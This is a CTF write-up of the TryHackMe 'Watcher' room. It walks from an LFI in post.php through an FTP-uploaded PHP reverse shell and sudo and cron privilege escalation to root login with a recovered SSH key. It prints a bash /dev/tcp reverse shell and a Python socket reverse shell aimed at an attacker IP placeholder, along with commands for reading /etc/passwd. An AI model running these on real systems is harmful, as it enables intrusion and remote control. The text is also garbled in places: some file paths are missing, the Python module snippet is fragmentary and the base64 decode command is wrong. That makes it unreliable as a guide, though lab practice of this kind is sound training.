Watcher is a room on TryHackMe. It is a boot2root CTF. It has medium difficulty. In this room you have to collect 7 flags.
First of all we start with basic enumeration. We navigate to the web server on port 80. This web server contains a “robots.txt” file with two entries.
This will give you your first flag. We cannot read the “secret_file_do_not_read.txt” file. But the “post” parameter of the PHP script at “http://10.10.73.152/post.php” is prone to a LFI. We can read the /etc/passwd file with that vulnerability.
Next we can read the secret file with that LFI vulnerability by calling the URL “http://10.10.73.152/post.php?post=secret_file_do_not_read.txt”. The file contains FTP credentials. So now we know that FTP is also running on the target. We can assume that the FTP server is running on the standard port 21.
After connecting to the FTP server with
ftp 10.10.73.152 we see a directory that is called “files” and a second flag.
Inside the “files” directory we have write access.
We can now upload a reverse shell into that directory. I have used the reverse shell from Pentestmonkey.
Next start a netcat listener with the command
nc -lvnp 1234. From the previous note, we know that the FTP directory is located at
/home/ftpuser/ftp/. So if we call the URL “http://10.10.73.152/post.php?post=/home/ftpuser/ftp/files/shell.php”, the web server will run the code and we will get a reverse shell.
Now we are on the machine as
www-data user. As
www-data user we can read the third flag, which is located at
During enumeration we can see that we can run all commands as
toby user if we use sudo.
Now we can elevate our privileges to
toby by running the command
sudo -u toby /bin/bash. After enumerating more, we can spot an interesting cronjob. The script at
home/toby/jobs/cow.sh is run as
mat user every minute.
Luckily we have write privileges to that file. This means we can place a reverse shell into that file and elevate our privileges to
mat. Write the following two lines into that file. You can use the
echo command for this.
bash -i >& /dev/tcp/YOUR_MACHINE_IP/8080 0>&1
Next start a Netcat listener on your machine and wait until the
mat user connects to you.
Inside mat’s home folder we can read the fifth flag and find this note.
As you can see we can run the script at
will user. That Python script calls a function from another script called
We have write privileges for the
So we can craft the following malicious Python script on our attacker machine and replace the original
cmd.py by transferring it to the victim.
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_MACHINE_IP",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])
if(num == "1"):
return "ls -lah"
if(num == "2"):
if(num == "3"):
return "cat /etc/passwd"
In the next step we will need to run another Netcat listener on port 1234 on our attacker machine. Finally execute the malicious script by running
sudo -u will /usr/bin/python3 /home/mat/scripts/will_script.py. After that you should get a shell as
will user. During enumeration as the
will user we can find an interesting file inside
/opt/backup. It contains a file called “key.b64”, which has base64 encoded data.
We can copy that file to our machine and decode it. You can use the command
echo key.b64 | base64 -d > sshkey. This is a SSH key, which we can use to log in as root. First change the permissions with
chmod 600 sshkey. After that log in as root with the command
ssh -i sshkey email@example.com.
First of all a filter should be utilized to fix the LFI vulnerability. Furthermore no secret notes should be accessible through a public web server. Also privileges for files are set wrongly. These privileges should be fixed. It is also recommended that backups should be encrypted.